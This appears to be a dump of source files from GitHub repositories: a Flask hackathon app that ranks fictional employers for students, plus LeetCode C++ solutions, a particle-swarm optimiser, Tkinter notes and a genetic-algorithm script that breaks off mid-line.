。\n__label__2, 教師 データ として は あまり 宜しい ない 感じ は する ます が 、 とりあえず fastText に 入力 する て みる ます 。\n__label__1, 精度 は 、 fastText によって 予測 する れる た ラベル の 中 の 正しい ラベル の 数 です 。 リコール は 、 すべて の 実際 の ラベル の うち 、 正常 に 予測 する れる た ラベル の 数 です 。 これ を より 明確 に する 例 を 見る て みる ます う 。\n__label__3, モデル によって 予測 する れる ラベル は です Food - safety 。 これ は 関係 ある ます ん 。 わけ か 、 モデル は 単純 だ 例 で は 失敗 する よう です 。\n\n```\n\n### train_data_fasttext.py でのMeCabの分かち書き挙動とfasttext形式ラベル付けの対応\n\n* 抽出する品詞の指定\n```\n# いらない品詞があるならばコメントアウト\nhinshi_list = [\n \"名詞\",\n \"動詞\",\n \"形容詞\",\n \"形容動詞\",\n \"記号\",\n \"助詞\",\n \"助動詞\",\n \"副詞\"\n ]\n```\n\n* MeCabの辞書(mecab-ipadic-neologd)のpath指定\n```\n tagger = MeCab.Tagger('-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd')\n```\n\n\n\n* fasttext形式でのラベル付け対応\n\n```\ndef convert2fasttext(bunrui):\n \"\"\" fastText用のラベルに変換 \"\"\"\n labels = {\n \"1\": \"__label__1\",\n \"2\": \"__label__2\",\n \"3\": \"__label__3\"\n #\"4\": \"__label__4\",\n #\"5\": \"__label__5\"\n }\n return labels[bunrui]\n```\nここではinput.csvの要素1列目の{label}が 1,2,3 でラベルしてあるケースとしています\n\n\n--------\n\n\n\n" } ]
2
Terairk/WEconnect
https://github.com/Terairk/WEconnect
175f5fca3073b31d0011edf77bd46ef41b12f393
4bbadc6cdbd9b2b477ecb742c98bf98abefcd0c5
56ff0a3909ed366afd4891d59fa23b432858118d
refs/heads/master
2022-12-12T23:50:29.333522
2020-09-19T00:32:48
2020-09-19T00:32:48
296,277,259
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7682926654815674, "alphanum_fraction": 0.7879924774169922, "avg_line_length": 70.06666564941406, "blob_id": "0e69934fe756ac489b7f952b8e820674f2df2f5c", "content_id": "8d370c385a69d31edc6ced24d410a53ca1383ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 256, "num_lines": 15, "path": "/README.md", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# WEconnect\nThis is a project for the Brunei AI for Good Hackathon\n\nThe main code is in app.py\nFor those who are wondering, main.py and generatevalues.py are places where i tested the code separetly from the flask project then later added them into the flask thing. The client_secret.json file contains info to access the google spreadsheets via code.\n\nThe actual website link to the project being deployed onto a server is http://43.245.220.12:5000/\nThat's where you can test the website for yourself and see what it does.\n\nThe UI is a bit bad but I think you'll get the main point. The final part is where it ranks the companies from best to worst (fake companies mind you)\n\nHere's the link to the figma (the frontend mock up that looks much better than this)\nhttps://www.figma.com/proto/5MqnNJjrJ7MtPUCK0xZglq/Team-6-Prototype---Students?node-id=15%3A2&scaling=min-zoom\n\nAlso if you want to run this code for yourselves, you need to import nltk and do nltk.download() in your python installation. And of course download all the files in the requirements.txt file.\n" }, { "alpha_fraction": 0.6445690989494324, "alphanum_fraction": 0.6727434992790222, "avg_line_length": 36.53110122680664, "blob_id": "2ba13de95b928a637b77ca88cab2a75e5f8fb9e3", "content_id": "b5240ef37d784682acb00e7e4f0f7a62f4d2dcbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7844, "license_type": "no_license", "max_line_length": 225, "num_lines": 209, "path": "/app.py", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# copied from main.py which was used for testing\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom nltk.corpus import wordnet as wn\nfrom PyDictionary import PyDictionary\n\ndictionary = PyDictionary()\n\n# Setting up the api's and their links\n# This project uses the google sheet api (which is connected to the google forms)\n# An adjective extractor library to extract adjectives from the extended response\n# This is done by nltk\n# Then we have the synonyms library to get synonyms for each adjective\n\n# Adjectives & Synonyms will be a multidimensional array, each sublist is each person's adjectives in their response\nadjectives = []\nsynonyms = []\n\n# Google sheets api set up\nscope = ['https://spreadsheets.google.com/feeds', \"https://www.googleapis.com/auth/drive\"]\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"client_secret.json\", scope)\nclient = gspread.authorize(creds)\nsheet = client.open(\"Students (Responses)\").sheet1\n\nperson = sheet.row_values(sheet.row_count)\n# for every response to the survey\nwords = person[11].split(\" \")\n\n# Whole thing checks if any words are adjectives and gets their synonyms\nfor w in words:\n if wn.synsets(w):\n\n tmp = wn.synsets(w)[0].pos()\n if tmp == \"a\":\n print(w, \":\", tmp)\n wSynonym = dictionary.synonym(w)\n synonyms += wSynonym\n\nprint(synonyms)\n\n# Start of employers lists\n# These are fake companies (some are based 
on real companies), you can tell from the names\n# Some of the subjects for some of the employers aren't super realistic, but others are\n# I just put in what came to mind for variety, Also locations are also fictional\n# A proper version would have actual employers with actual locations and what not\n# The values in the list are based on the spreadsheet questions\n# Values are randomised externally (not in the website for consistency) using random.org, so they're not real values\n\nemployer1 = [2020, \"computerland\", \"Belait\", True, [\"English\", \"History\", \"Business\", \"Computer Science\"], 1, 5, 6, 4, 6, True, ['honest', 'confident', 'adventurous', 'productive', 'original', 'courteous']]\nemployer2 = [2020, \"novideo\", \"Belait\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 2, 5, 10, 8, 10, False, ['positive', 'creative thinking', 'reliable', 'confident', 'agreeable', 'considerate']]\nemployer3 = [2020, \"ayyyymd\", \"Brunei-Muara\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 4, 10, 3, 3, 10, True, ['positive', 'honest', 'reliable', 'confident', 'agreeable', 'adventurous']]\nemployer4 = [2020, \"shintel\", \"Temburong\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 7, 4, 9, 10, 10, False, ['positive', 'reliable', 'confident', 'considerate', 'adventurous', 'original']]\nemployer5 = [2020, \"Bdope\", \"Tutong\", True, [\"Art\", \"Psychology\", \"Business\", \"Economics\"], 2, 8, 4, 4, 5, True, ['positive', 'honest', 'creative thinking', 'reliable', 'confident', 'agreeable']]\nemployer6 = [2020, \"Lavinci\", \"Brunei-Muara\", True, [\"Art\", \"English\", \"Psychology\", \"Economics\"], 7, 2, 2, 10, 10, True, ['positive', 'creative thinking', 'reliable', 'confident', 'agreeable', 'considerate']]\nemployer7 = [2020, \"yCircle\", \"Belait\", False, [\"Maths\", \"Physics\", \"Computer Science\"], 3, 7, 6, 2, 9, False, ['loyal', 'reliable', 'agreeable', 'considerate', 'enthusiastic', 'courteous']]\nemployer8 = [2020, \"Shell\", \"Brunei-Muara\", False, [\"Economics\", \"Business\", \"Geography\"], 6, 2, 1, 9, 10, True, ['positive', 'confident', 'agreeable', 'productive', 'fluent', 'sincere']]\nemployer9 = [2020, \"Pear\", \"Tutong\", True, [\"Computer Science\", \"Physics\", \"Business\"], 9, 3, 5, 2, 10, True, ['honest', 'confident', 'considerate', 'adventurous', 'productive', 'enthusiastic']]\nemployer10 = [2020, \"Wacdonalds\", \"Belait\", False, [\"Psychology\", \"English\", \"Geography\", \"Economics\", \"Drama\"], 10, 10, 1, 5, 10, True, ['honest', 'creative thinking', 'reliable', 'considerate', 'original', 'trustworthy']]\nemployer11 = [2020, \"WagyuQueen\", \"Belait\", False, [\"Psychology\", \"English\", \"Geography\", \"Economics\"], 1, 4, 8, 10, 3, False, ['positive', 'honest', 'confident', 'adventurous', 'considerate', 'productive']]\n\nemployers = []\nemployers.append(employer1)\nemployers.append(employer2)\nemployers.append(employer3)\nemployers.append(employer4)\nemployers.append(employer5)\nemployers.append(employer6)\nemployers.append(employer7)\nemployers.append(employer8)\nemployers.append(employer9)\nemployers.append(employer10)\nemployers.append(employer11)\n\n\nemployersWeightingScores = {}\nfor i in range(11):\n employersWeightingScores[i] = 0.1\n\n# Weighting Algorithm Part\n# There are some arbitary values that I've decided to use for the weight\n# like how location is worth 5 and virtual work is worth 2.\n# Also the higher the weight for the 
employers, the better\n# It's like the employers score\n\ni = 0\nfor employer in employers:\n weight = float(0)\n #Location\n userLocation = person[2]\n if userLocation == employer[2]:\n weight += 5\n\n #VirtualWork\n\n if person[3] == employer[3]:\n weight += 2\n\n #Subjects\n\n usersubjects = person[4].split(', ')\n for user_subject in usersubjects:\n for employer_subject in employer[4]:\n if user_subject == employer_subject:\n weight += 1.5\n\n #Teamwork skills\n\n # If an employer has a 2 for importance on teamwork, then it'll have a weight of 0.4 per point that the user has.\n # If an employer has a 9 for importance on teamwork, then it'll have a weight of 1.8 per point that the user has.\n # Ie it dictates how important the employer values teamwork and future skills\n weight += float(person[5]) * (float(employer[5]) * 0.1)\n\n #Creativity\n\n weight += float(person[6]) * (float(employer[6]) * 0.1)\n\n #Organization skills\n\n weight += float(person[7]) * (float(employer[7]) * 0.1)\n\n #Problem Solving Skills\n\n weight += float(person[8]) * (float(employer[8]) * 0.1)\n\n #General Computer Skills\n\n weight += float(person[9]) * (float(employer[9]) * 0.1)\n\n #Willingness to learn\n\n if person[10] == False and employer[10] == True:\n weight -= 3\n elif person[10] == True and employer[10] == True:\n weight += 3\n\n #Qualities\n for employerquality in employer[11]:\n for userquality in synonyms:\n if userquality == employerquality:\n weight += 0.5\n\n employersWeightingScores[i] = weight\n i += 1\n\nfinalList = []\n# sort employers weighting score\nsortedRankings = sorted(employersWeightingScores, key=employersWeightingScores.get)\nsortedRankings.reverse()\nfor i in range(11):\n employerName = employers[sortedRankings[i]][1]\n s = str(i+1) + \": \" + employerName\n print(s)\n finalList.append(s)\n\nfrom flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n {\n \"author\": \"Ahmad Jamsari\",\n \"title\": \"Blog Post 1\",\n \"content\": \"First content\",\n \"date_posted\": \"April 20, 2018\"\n },\n {\n \"author\": \"Jane Doe\",\n \"title\": \"Blog Post 2\",\n \"content\": \"Second post content\",\n \"date_posted\": \"April 21, 2018\"\n }\n]\n\[email protected]('/')\[email protected](\"/home\")\ndef home():\n return render_template(\"home.html\", posts=posts)\n\n\[email protected]('/about')\ndef about():\n return render_template(\"about.html\", title=\"About\")\n\n\[email protected]('/login')\ndef login():\n return render_template(\"login.html\")\n\n\[email protected]('/register')\ndef register():\n return render_template(\"register.html\")\n\n\[email protected]('/employers')\ndef employer():\n return render_template(\"employer.html\")\n\n\[email protected]('/students')\ndef student():\n return render_template(\"students.html\")\n\[email protected]('/final')\ndef final():\n return render_template(\"final.html\", companies = finalList)\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.692307710647583, "avg_line_length": 12.166666984558105, "blob_id": "059a8c35b50ba0941f8cde1eaec7acddb025b914", "content_id": "3ef17d42369bc1d914dd553cea5e6a88d0ab2b51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 78, "license_type": "no_license", "max_line_length": 19, "num_lines": 6, "path": "/requirements.txt", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "Flask==1.1.2\n\ngspread~=3.6.0\noauth2client~=4.1.3\nnltk~=3.5\nPyDictionary~=2.0.1" }, { 
"alpha_fraction": 0.5957327485084534, "alphanum_fraction": 0.605277955532074, "avg_line_length": 31.290908813476562, "blob_id": "cee088ae713138195bc087b66f9f582ad4256569", "content_id": "4de0e0659fa30e7277f202f3017167d31a8c3413", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 109, "num_lines": 55, "path": "/generate_values.py", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# This is a python file to generate the values for various employers\n# Manually inputting values from random.org is kinda a pain\n# Also manually inputting lots of qualities is also a pain\n# I had to manually input subjects and it was kind of a pain\n# So to save me from this pain, I'll create a whole new program\n# This might save me time, it might not, this file generates the values after the subjects for employer lists\n# Edit: It saved me time\n# Noticed that code isn't perfect as it could generate multiple of the same quality but that's fine\n\nfrom random import randint\n\n# Qualities that Employers want\nqualities = [\"friendly\", \"positive\", \"fluent\", \"confident\", \"honest\", \"humble\", \"courteous\", \"trustworthy\",\n \"honorable\", \"creative thinking\", \"original\", \"inventive\", \"productive\", \"adventurous\",\n \"agreeable\", \"ambitious\", \"bright\", \"considerate\", \"enthusiastic\", \"helpful\",\n \"loyal\", \"reliable\", \"sensible\", \"sincere\"]\n\n\n# Loop for each employer\nfor i in range(11):\n\n # Get the 5 values after the subjects\n for i in range(5):\n value = randint(1,10)\n print(value, end=\", \")\n\n # True or False\n willingnessToLearn = randint(0,1)\n toLearn = False\n if willingnessToLearn == 0:\n print(\"False\", end=\", \")\n else:\n print(\"True\", end=\", \")\n\n temp = []\n\n # Employer qualities\n print(\"[\", end=\"\")\n for i in range(20):\n value = randint(0, len(qualities) - 1)\n # fixes duplicates\n temp.append(qualities[value])\n temp = list(set(temp))\n s = \"'\" + temp[-1] + \"'\"\n\n\n for i in range(6):\n s = \"'\" + temp[i] + \"'\"\n if i == 5:\n print(s, end=\"\")\n else:\n print(s, end=\", \")\n\n print(\"]\", end=\"\")\n print()\n\n\n\n\n\n" } ]
4
MoMiJ1/Fungus
https://github.com/MoMiJ1/Fungus
34a1bfd7038da87a722bc155f7453656e1fc3168
e280984f84557c7ac48dd1bbcd848f08bb6d50f3
6966c91325bfdccbe3626368e53eea2e4e4edc63
refs/heads/master
2021-07-02T15:11:51.131692
2021-06-22T11:43:14
2021-06-22T11:43:14
237,172,413
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3710247278213501, "alphanum_fraction": 0.3922261595726013, "avg_line_length": 18.285715103149414, "blob_id": "2186f1ff72ce5687b0765c71d891e6f0ae087af8", "content_id": "dc777ff39f21a6dca77b181805fa8f9d3ff8b206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 572, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/leetcode/leetcode9.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 9. 回文数\r\n\r\nclass Solution {\r\npublic:\r\n bool isPalindrome(int x) {\r\n queue<int> que;\r\n int count=0;\r\n long a=0;\r\n long b = x;\r\n if (x<0){\r\n return false;\r\n }\r\n while (x!=0){\r\n que.push(x%10);\r\n x = x/10;\r\n count++;\r\n }\r\n while (!que.empty()){\r\n a = a+que.front()*pow(10,--count);\r\n que.pop();\r\n }\r\n if (a-b == 0){ return true;}\r\n return false;\r\n }\r\n};" }, { "alpha_fraction": 0.4955357015132904, "alphanum_fraction": 0.5106026530265808, "avg_line_length": 36.12765884399414, "blob_id": "734ae03af3791214ec2d4cbe8a4d20f66bd569c1", "content_id": "e475f293153eda5c122349f803a4a047fad2c275", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3782, "license_type": "no_license", "max_line_length": 107, "num_lines": 94, "path": "/python/PSO.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 计算函数 f(x,y) = 5cos(xy) + xy + y^3 的最小值\r\n# x ∈ [ -5, 5 ] y ∈ [-5,5 ]\r\n\r\n\r\nclass PSO:\r\n def __init__(self, iterTimes, groupSize, varNums, bound):\r\n '''\r\n :param iterTimes: 迭代次数\r\n :param groupSize: 解集大小\r\n :param varNums: 变量数量\r\n :param bound: 变量约束 [[x_min, y_min, z_min...] [x_max, y_max, z_max]]\r\n '''\r\n self.iterTimes = iterTimes\r\n self.groupSize = groupSize\r\n self.varNums = varNums\r\n self.bound = bound\r\n\r\n self.p_sites = np.zeros((self.groupSize, self.varNums))\r\n self.p_v = np.zeros((self.groupSize, self.varNums))\r\n self.p_optimal = np.zeros((self.groupSize, self.varNums))\r\n self.Optimal = np.zeros((1, self.varNums))\r\n self.alpha1, self.alpha2 = 1, 1\r\n self.weight = 0.5\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n temp_score = -1\r\n for i in range(self.groupSize):\r\n for j in range(self.varNums):\r\n # 1. 随机初始化粒子位置与速度\r\n self.p_sites[i][j] = np.random.uniform(self.bound[0][j], self.bound[1][j])\r\n self.p_v[i][j] = np.random.uniform(0, 1)\r\n # 2. 初始化粒子最好位置\r\n self.p_optimal[i] = self.p_sites[i]\r\n # 3. 评价当前粒子最好位置\r\n score = self.fitness(self.p_optimal[i])\r\n # 4. 更新全局最好位置\r\n if score > temp_score:\r\n self.Optimal = self.p_optimal[i]\r\n temp_score = score\r\n\r\n # 自定义函数\r\n def fitness(self, values):\r\n return (5 * np.cos(values[0] * values[1]) + values[0] * values[1] + pow(values[1], 3))\r\n\r\n # 更新位置与速度\r\n def update_params(self, group_size):\r\n for i in range(group_size):\r\n # 1. 更新速度\r\n self.p_v[i] = self.weight * self.p_v[i] + \\\r\n self.alpha1 * np.random.uniform(0, 1) * (self.p_optimal[i] - self.p_sites[i]) + \\\r\n self.alpha2 * np.random.uniform(0, 1) * (self.Optimal - self.p_sites[i])\r\n # 2. 更新位置\r\n self.p_sites[i] = self.p_sites[i] + self.p_v[i]\r\n # 3. 防止变量越界\r\n for j in range(self.varNums):\r\n if self.p_sites[i][j] < self.bound[0][j]:\r\n self.p_sites[i][j] = self.bound[0][j]\r\n if self.p_sites[i][j] > self.bound[1][j]:\r\n self.p_sites[i][j] = self.bound[1][j]\r\n # 4. 
更新最优位置\r\n if self.fitness(self.p_sites[i]) > self.fitness(self.p_optimal[i]):\r\n self.p_optimal[i] = self.p_sites[i]\r\n if self.fitness(self.p_sites[i]) > self.fitness(self.Optimal):\r\n self.Optimal = self.p_sites[i]\r\n\r\n def run(self):\r\n scores = []\r\n self.tempOptimal = np.zeros((1, self.varNums))[0]\r\n for i in range(self.iterTimes):\r\n self.update_params(self.groupSize)\r\n scores.append(-self.fitness(self.Optimal))\r\n if self.fitness(self.Optimal) > self.fitness(self.tempOptimal):\r\n self.tempOptimal = self.Optimal.copy()\r\n print(f\"{i}代 : {-self.fitness(self.tempOptimal)} : {self.tempOptimal}\")\r\n self.display(scores)\r\n\r\n def display(self, data):\r\n plt.plot(range(self.iterTimes), data, color='lightcoral')\r\n plt.title(\"iteration - score\", color='r')\r\n plt.xlabel(\"iteration\")\r\n plt.ylabel(\"score\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n bound = [[-5, -5], [5, 5]]\r\n pso = PSO(iterTimes=50, groupSize=20, varNums=2, bound=bound)\r\n pso.run()\r\n" }, { "alpha_fraction": 0.41992881894111633, "alphanum_fraction": 0.43505337834358215, "avg_line_length": 20.078432083129883, "blob_id": "76e9803f12d0ccc83b06112a315247da113a2d49", "content_id": "20907660afc4e8e9a8ad1077af2a112044c992af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1156, "license_type": "no_license", "max_line_length": 55, "num_lines": 51, "path": "/leetcode/leetcode26_27_28.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 26.删除有序数组的重复项\r\n\r\nclass Solution {\r\npublic:\r\n int removeDuplicates(vector<int>& nums) {\r\n int i = 0;\r\n for (int j = 1; j < nums.size(); j++) {\r\n if (nums[j] == nums[j-1]){\r\n j--;\r\n nums.erase(nums.begin()+j);\r\n }\r\n }\r\n int k = nums.size();\r\n return k;\r\n }\r\n};\r\n\r\n// LeetCode 27.移除元素\r\n\r\nclass Solution {\r\npublic:\r\n int removeElement(vector<int>& nums, int val) {\r\n int k = 0;\r\n for(int i = 0;i<nums.size();i++){\r\n if(nums[i]!=val){\r\n nums[k++] = nums[i];\r\n }\r\n }\r\n return k;\r\n }\r\n};\r\n\r\n// LeetCode 28.实现strstr\r\n\r\nclass Solution {\r\npublic:\r\n int strStr(string haystack, string needle) {\r\n if (needle.empty()) {return 0;}\r\n int l = needle.size();\r\n if (l > haystack.size()){return -1;}\r\n for (int i = 0; i < haystack.size()-l+1; i++) {\r\n if (haystack.compare(i,l,needle)==0) {\r\n return i;\r\n }\r\n }\r\n return -1;\r\n }\r\n};" }, { "alpha_fraction": 0.4502212405204773, "alphanum_fraction": 0.49668142199516296, "avg_line_length": 32.846153259277344, "blob_id": "28f99fe7a74016f29c0e93d4ef24528287f799ec", "content_id": "8eb6626bf652fbce216bb0b7a5c750f0e5bf0b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 914, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/leetcode/leetcode539.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n# define DAY 1440\r\n\r\n// LeetCode 539.最小时间差\r\n\r\nclass Solution {\r\npublic:\r\n int findMinDifference(vector<string>& timePoints) {\r\n sort(timePoints.begin(),timePoints.end());\r\n int res = 1440;\r\n for(int i = 0; i < timePoints.size()-1; i++){\r\n int h1 = atoi(timePoints[i].substr(0,2).c_str());\r\n int m1 = atoi(timePoints[i].substr(3,2).c_str());\r\n for(int j = i + 1; j < timePoints.size(); j++){\r\n if(timePoints[i] == timePoints[j]) return 0;\r\n 
int h2 = atoi(timePoints[j].substr(0,2).c_str());\r\n int m2 = atoi(timePoints[j].substr(3,2).c_str());\r\n int tmp1 = abs(h2*60+m2-h1*60-m1);\r\n int tmp2 = DAY - tmp1;\r\n if(min(tmp1,tmp2) < res) res = min(tmp1,tmp2);\r\n }\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.5071805119514465, "alphanum_fraction": 0.5268133282661438, "avg_line_length": 29.4228572845459, "blob_id": "64c82c35ccba02240b1b234bc00b13f70667f829", "content_id": "fa69bc1e5fc7ede17d5819e61ddeb4e151823e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6269, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/python/gui.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import sys\r\nif sys.version_info.major < 3:\r\n import Tkinter\r\nelse:\r\n import tkinter as Tkinter\r\n\r\n\r\n'''\r\n 【基本控件】\r\n 1. Radiobutton(root, text, variable, value)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param variable: 绑定选择的变量\r\n :param value: 该选项对应的值\r\n\r\n 2. Button(root, text, command)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param command: 点击时调用的函数\r\n\r\n 3. Checkbutton(root, text, variable)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param variable: 绑定选择变量\r\n\r\n 4. Scale(root, label, length, from_, to, resolution, variable, orient)\r\n :param root: Tk\r\n :param label: 显示的名称\r\n :param length: 滑块长度\r\n :param from_: 左边界\r\n :param to: 右边界\r\n :param resolution: 步长\r\n :param variable: 绑定选择变量\r\n :param orient: 滑动方向\r\n \r\n 5. Label(root, text, textvariable, font, justify, foreground, underline, anchor, width, height, bg)\r\n :param text: 静态文本\r\n :param textvariable: 动态文本\r\n :param font: 字体,格式为一个tuple (font_name, font_size)\r\n :param justify: 对齐方式,有:['center','left','right']\r\n :param foreground: 文本颜色\r\n :param underline: 单个字符添加下划线,传入值为目标字符串的索引\r\n :param anchor: 位置,可选(n,s,w,e,ne,nw,sw,se,center),eswn对应东南西北\r\n \r\n 6. 
grid(row, column)\r\n :param row: 控件所在的行位置\r\n :param column:控件所在的列位置 \r\n'''\r\ndef basic_widget(method=\"pack\"):\r\n def initUI(name='gui', size='900x600'):\r\n root = Tkinter.Tk()\r\n root.title(name)\r\n root.geometry(size)\r\n return root\r\n\r\n def click(i):\r\n if i == 1:\r\n print('选择:', choose_list[choose.get()])\r\n elif i == 2:\r\n selects = []\r\n for k, v in abcd.items():\r\n if v.get(): selects.append(k)\r\n print(\"选择:\", selects)\r\n elif i == 3:\r\n print(factor.get())\r\n\r\n\r\n if __name__ == \"__main__\":\r\n root = initUI()\r\n\r\n # 单选\r\n choose_list = ['A', 'B', 'C', 'D']\r\n choose = Tkinter.IntVar()\r\n choose.set(0)\r\n for i, val in enumerate(choose_list):\r\n Tkinter.Radiobutton(root, text=val, variable=choose, value=i).pack()\r\n Tkinter.Button(root, text=\"单选\", command=click(1)).pack()\r\n\r\n # 复选\r\n a, b, c, d = Tkinter.BooleanVar(), Tkinter.BooleanVar(), Tkinter.BooleanVar(), Tkinter.BooleanVar()\r\n abcd = {'A': a, 'B': b, 'C': c, 'D': d}\r\n for k, v in abcd.items():\r\n v.set(0)\r\n Tkinter.Checkbutton(root, text=k, variable=v).pack()\r\n Tkinter.Button(root, text=\"复选\", command=click(2)).pack()\r\n\r\n # 滑块\r\n factor = Tkinter.DoubleVar()\r\n factor.set(0.800)\r\n Tkinter.Scale(root, label='滑块', length=200, from_=0., to=1.0, resolution=0.001,\r\n variable=factor, orient=Tkinter.HORIZONTAL).pack()\r\n Tkinter.Button(root, text='输出', command=click(3)).pack()\r\n\r\n # 文本显示\r\n text = Tkinter.StringVar()\r\n text.set(\"This is a text;这是个文本。\")\r\n label = Tkinter.Label(root,textvariable=text,font=('宋体',15),foreground='black',\r\n underline=3,anchor='nw',width=30,height=2,bg='white')\r\n\r\n # 文本输入\r\n e = Tkinter.Entry(root)\r\n e.pack()\r\n Tkinter.Button(root, text=\"修改\").pack()\r\n\r\n root.mainloop()\r\n\r\n\r\n\r\n'''\r\n 【画布】\r\n 1. Canvas(root, bg, width, height)\r\n :param root: Tk\r\n :param bg: 画布背景颜色\r\n :param width: 画布宽\r\n :param heigth: 画布高\r\n \r\n 2. create_line(point, arrow, arrowshape, dash, width)\r\n :param point: 要连线的点的坐标\r\n :param arrow: 箭头,first--箭头在起始点,last--箭头在目标点,both--双箭头\r\n :param arrowshape: 箭头大小,传入一个tuple,如--(3,4,5)\r\n :param dash: 是否绘制虚线,默认False\r\n :param width: 线的宽度\r\n :param tags: 标签\r\n \r\n 3. create_oval(point, fill, outline, width)\r\n :param point: 椭圆的外接矩形的左上角和右下角坐标\r\n :param fill: 内部填充颜色\r\n :param outline: 边颜色\r\n :param width: 边宽\r\n :param tags: 标签\r\n \r\n 4. create_text(point, text, font)\r\n :param point: 文字所在点\r\n :param text: 文本内容\r\n :param font: 使用字体,传入tuple,如:(\"宋体\",12)\r\n \r\n 5. 
bind(event, handler)\r\n :param event: \r\n 常用的:\r\n (1) 26个字母,如: 'n','s'等,直接按键盘对应的键就可\r\n (2) <Button-1>:鼠标左键点击, <Button-3>: 右键点击\r\n <Button-4>: 向上滚轮, <Button-5>: 向下滚轮\r\n <Double-Button-1>: 左键双击,右键同理\r\n (3) <Return>:回车;<BackSpace>:删除;<Escape>:esc\r\n <Left>,<Up>,<Right>,<Down>: 方向键\r\n :param handler: event发生后的操作,可以是一个函数\r\n'''\r\n# 画布\r\ndef tk_canvas():\r\n def initUI(name='windows', size='900x600', width=900, height=500, bg='white'):\r\n root = Tkinter.Tk()\r\n root.geometry(size)\r\n root.title(name)\r\n cv = Tkinter.Canvas(root, bg=bg, width=width, height=height)\r\n return root,cv\r\n\r\n\r\n if __name__ == \"__main__\":\r\n root,cv = initUI()\r\n p1 = [[100,100],[300,200]]\r\n\r\n cv.create_line(p1,arrow=\"first\",arrowshape=(7,7,7),dash=True,width=5,tags=\"line\")\r\n cv.create_oval(p1,outline='blue',fill=\"pink\",width=10,tags=\"oval\")\r\n cv.create_text((400,300),text=\"hello\",font=(\"source code pro\",12))\r\n cv.grid(row=0)\r\n\r\n Tkinter.Button(root,text=\"btn1\").grid(row=1,column=0)\r\n Tkinter.Button(root,text=\"btn2\").grid(row=2)\r\n\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n basic_widget()\r\n tk_canvas()\r\n\r\n" }, { "alpha_fraction": 0.44222721457481384, "alphanum_fraction": 0.4641132950782776, "avg_line_length": 30.705263137817383, "blob_id": "a7923267a9f81a50749fd9b4cc97f50ffef35e3b", "content_id": "102b08a78297878655185913bdac578b8503dd51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "no_license", "max_line_length": 119, "num_lines": 95, "path": "/python/GA_simple.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass GA_extremum:\r\n\r\n # 求解 x*sin(2x)*e^(-0.5x) 在 0<=x<=1 时的最大值\r\n # 使用浮点数编码\r\n\r\n def __init__(self, M_Size, T, Pc, Pm, bound_min, bound_max):\r\n '''\r\n :param M_Size: 种群数量\r\n :param T: 遗传代数\r\n :param Pc: 交叉概率\r\n :param Pm: 变异概率\r\n :param bound_min: 搜素上届\r\n :param bound_max: 搜索下界\r\n '''\r\n self.M_Size = M_Size\r\n self.T = T\r\n self.Pc = Pc\r\n self.Pm = Pm\r\n self.bound_min = bound_min\r\n self.bound_max = bound_max\r\n\r\n self.Optimal = [0, 0]\r\n\r\n # 随机生成初始解\r\n def initM(self):\r\n return [np.random.uniform(self.bound_min, self.bound_max) for i in range(self.M_Size)]\r\n\r\n # 目标函数\r\n def myfunc(self, x):\r\n return x * np.sin(2 * x) * np.exp(-0.5 * x)\r\n\r\n # 适应度函数\r\n def fitness(self, M):\r\n return [self.myfunc(M[i]) for i in range(self.M_Size)]\r\n\r\n # 选择: 最优保存选择\r\n def select(self, fitness, M):\r\n if np.max(fitness) > 